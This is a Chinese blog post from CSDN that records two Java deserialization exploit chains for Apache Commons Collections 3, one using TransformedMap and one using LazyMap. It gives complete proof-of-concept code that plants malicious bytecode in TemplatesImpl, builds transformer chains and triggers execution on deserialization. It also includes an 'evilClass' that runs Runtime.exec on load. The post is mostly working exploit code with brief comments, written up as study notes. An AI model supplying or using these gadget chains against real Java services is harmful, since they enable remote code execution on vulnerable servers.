Java反序列化 CC3 TransformedMap利用链与LazyMap利用链记录

最新推荐文章于 2024-05-16 20:42:16 发布
最新推荐文章于 2024-05-16 20:42:16 发布
阅读量137 收藏
点赞数
分类专栏: Java反序列化利用链 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTianHang/article/details/128912519
版权

Java反序列化 CC3 TransformedMap利用链与LazyMap利用链记录

CC3 基于TransformedMap利用链代码

package CC_Chain.CC3;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC3_POC1 {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("CC_Chain.CC3.evilClass");
        byte[] bytes = ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templatesImpl = new TemplatesImpl();
        Field field1 = templatesImpl.getClass().getDeclaredField("_name");
        Field field2 = templatesImpl.getClass().getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templatesImpl, "evilClass");
        field2.set(templatesImpl, new byte[][]{bytes});
        //通过反射将bytes和一个name赋值给TemplatesImpl的_name和_bytecodes
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
        };
        Transformer chainedTransformer = new ChainedTransformer(transformers);
        //构造触发newTransform()的利用链,InstantiateTransformer的transform()会将TrAXFilter实例化传入template,触发在构造方法中的newTransform方法
        HashMap map = new HashMap();
        map.put("value", "asd");
        Map transformedMap = TransformedMap.decorate(map, null, chainedTransformer);
        Class classInstance = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = classInstance.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler annotationinvocationHandler = (InvocationHandler) constructor.newInstance(Target.class, transformedMap);
        //反射调用
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(annotationinvocationHandler);
        objectOutputStream.close();
        //序列化
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }
}

CC3 基于LazyMap利用链代码

package CC_Chain.CC3;


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;


import javax.xml.transform.Templates;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class CC3_POC2 {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("CC_Chain.CC3.evilClass");
        byte[] bytes = ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templates = new TemplatesImpl();
        //可以直接new不需要像AnnotationInvocationHandler一样必须通过反射(类修饰符不同)
        Class classInstance = templates.getClass();
        Field field1 = classInstance.getDeclaredField("_name");
        Field field2 = classInstance.getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templates, "evilCLass");
        field2.set(templates, new byte[][]{bytes});
        //反射设置属性
        Transformer[] transFormers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
        };
        Transformer chainedTransformer = new ChainedTransformer(transFormers);
        InvokerTransformer transformer = new InvokerTransformer("newTransformer", null, null);
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
        //在commoncellection3中使用LazyMap.decorate(map,chainedTransformer);
        classInstance = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = classInstance.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class, lazyMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), lazyMap.getClass().getInterfaces(), invocationHandler);
        //生成代理类
        InvocationHandler annotationinvocationHandler = (InvocationHandler) constructor.newInstance(Target.class, proxyMap);
        //将代理类传入

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(annotationinvocationHandler);
        objectOutputStream.close();
        //序列化
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();
    }
}

恶意类代码

package CC_Chain.CC3;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class evilClass extends AbstractTranslet {
    //需要继承AbstractTranslet,因为在defineTransletClasses中会判断是否继承了这个类没有会报错
    public evilClass() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    //两种触发方式构造方法和静态代码块
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}
keleth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全学习笔记--反序列化漏洞利用CC3
m0_64685672的博客
01-19 1210
测试环境 jdk1.7(jdk7u80) Commons Collections3.1 CC3大体上是CC1和CC2的结合,利用核心原理基于CC2的(动态字节码注入恶意类),使用TransformedMap和lazyMap配合cc1的annotationinvocation类触发newTransformer方法,所以CC3不适用jdk1.8。 恶意类 import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun
java反序列化利用程序UI版Beta1.1.rar
07-20
java反序列化利用程序UI版Beta1.1.a
java安全 反序列化(二)
sechelper的博客
12-07 568
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
Java 反序列化漏洞-Apache Commons Collections1-LazyMap 攻击
cjdgg的博客
02-11 3404
Java 反序列化漏洞-Apache Commons Collections1-LazyMap 攻击前言漏洞挖掘本地弹出POCTiedMapEntry.getValue()TiedMapEntry.toString() 前言 前面分析完了CC1的TransformedMap攻击,但考虑到篇幅太大不利于查看,所以单独再写一篇CC1的LazyMap攻击 漏洞挖掘 本地弹出POC 这条前面的挖掘就不说了,挖掘过程可以看看上一篇文章 接下来我们看看lazymap的get方法 可以看到get方法里面调用了
java lazymap_java反序列化-ysoserial-调试分析总结篇(7)
weixin_33887804的博客
02-28 334
前言:CommonsCollections7外层也是一条新的构造,外层由hashtable的readObject进入,这条构造挺有意思,因为用到了hash碰撞yso构造分析:首先构造进行rce所需要的转换,这里也用的是chianed里面套Constantrans+invoketrans的方法接着构造两个hashmap,通过lazymap的decorate用chained进行装饰后放进hash...
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 920
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
基于混合分析的Java反序列化利用挖掘方法
05-14
基于混合分析的Java反序列化利用挖掘方法 Java 程序开发 软件开发 参考文献 专业指导 计算机 课程资料 学习资料
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具
深入理解Java对象的序列化与反序列化的应用
09-05
本篇文章是对Java中对象的序列化与反序列化进行了详细的分析介绍,需要的朋友参考下
10-java安全——java反序列化CC3和CC4分析
网络安全
07-20 1859
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3335
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Java安全』反序列化-CC3反序列化漏洞POP分析_ysoserial CommonsCollections3 PoC分析
Ho1aAs‘s Blog
03-11 774
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定对象的指定类构造器3. LazyMap.get()调用this.factory.transform()构造ChainedTransformer生成lazyMap4. Proxy动态代理+AnnotationInvokerHandler调用LazyMap.get()5. Ann
jdk8新特性----Lambda表达式
w_t_y_y的博客
05-11 441
Java的Lambda表达式是Java 8引入的一个特性,它支持函数式编程,允许将函数作为方法的参数或返回值,从而简化了匿名内部类的使用,并提供了对并行编程的更好支持。
jar包增量更新分析
junlaiyan的专栏
05-16 137
借助jdeps分析出jar包的增量文件
CMS垃圾回收器为什么被移除
m0_54187478的博客
05-10 520
由于上述缺点,加上需要将资源投入到更现代垃圾回收器的开发和优化上,Oracle决定从Java 9开始标记CMS为废弃,并在后续版本中完全移除CMS。这些新的收集器旨在提供更低的停顿时间和更高的性能,同时减少配置和维护的复杂性。当它在垃圾收集周期内无法足够快地回收内存时,会退回到一种需要完全暂停所有应用线程的老年代收集模式,这与它设计的初衷相违背。:CMS使用的标记-清除算法会导致较多的内存碎片。:CMS需要更多的CPU资源来执行垃圾回收的并发阶段,而且它在运行时对系统资源的利用也较为激进。
java导出excel动态加载多sheet多复杂表头
weixin_43931108的博客
05-14 203
java导出excel动态加载多sheet多复杂表头
Android Model引入其他aar包 导致无法打包成aar
最新发布
qq_27400335的博客
05-16 236
Android Model引入其他aar包 导致无法打包成aar
java反序列化利用
04-29
Java反序列化利用是指黑客利用Java反序列化漏洞,通过构造恶意的序列化数据,将恶意代码注入目标系统,从而实现攻击的手段。Java反序列化漏洞可能带来很大的风险,因为黑客可以利用它来实现各种攻击,比如代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值